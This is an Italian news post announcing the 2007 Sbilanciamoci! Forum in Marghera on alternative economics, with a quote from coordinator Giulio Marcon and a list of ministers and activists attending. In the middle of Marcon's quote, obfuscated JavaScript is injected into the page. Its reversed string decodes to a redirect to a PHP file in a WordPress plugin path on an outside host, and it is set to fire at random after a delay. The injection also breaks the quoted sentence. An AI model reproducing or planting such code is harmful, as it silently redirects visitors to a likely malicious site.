Economia. A Marghera il Forum di Sbilanciamoci!

image_pdfimage_print

Si terrà a Marghera (VE) dal 6 al 9 settembre 2007 la V edizione del Forum “L’impresa di un’economia diversa”, appuntamento che ogni anno la Campagna Sbilanciamoci! organizza in contemporanea e in alternativa al meeting di Cernobbio dello studio Ambrosetti.
Riparte così dal Nordest italiano la critica della società civile al neoliberismo: per quattro giorni Marghera, città simbolo della devastazione ambientale sviluppista, sarà al centro del confronto fra politica e società civile sui temi dell’ambiente, della pace, dell’economia, della solidarietà. Titolo del Forum 2007: “Globale e locale per un modello di sviluppo dal basso, sostenibile e partecipato”.
“Cercheremo di approfondire se e come, dopo oltre un anno di governo di centro-sinistra, è possibile pensare ad un’economia diversa, fondata sul ruolo centrale del settore pubblico e su un mercato dalle regole trasparenti e condivise”, ha dichiarato present (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando l’iniziativa Giulio Marcon, coordinatore di Sbilanciamoci!. “E’ possibile scrivere una legge finanziaria capace di rimettere al centro i diritti e la solidarietà, il disarmo e lo sviluppo sostenibile, il welfare e l’ambiente?”, si chiede Marcon. “La società civile organizzata dal basso pensa sia doveroso, per questo vogliamo confrontarci costruttivamente con la politica e il governo, per delineare insieme una risposta adeguata alla complessità della società in cui viviamo.”
Al Forum parteciperanno numerosi economisti, amministratori, politici, ricercatori ed esponenti della società civile italiana e internazionale. Tra i protagonisti citiamo i ministri Paolo Ferrero (Solidarietà Sociale) Rosy Bindi (Famiglia), Fabio Mussi (Università e Ricerca), Alfonso Pecoraro Scanio (Ambiente) e gli esponenti dei movimenti internazionali contro il liberismo Walden Bello, Aruna Roy, Jose Bovè, Susan George, Josè Abelli, Mustafa Barghuti, John Christensen.
Il programma completo è disponibile sul sito della Campagna: www. sbilanciamoci.org.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *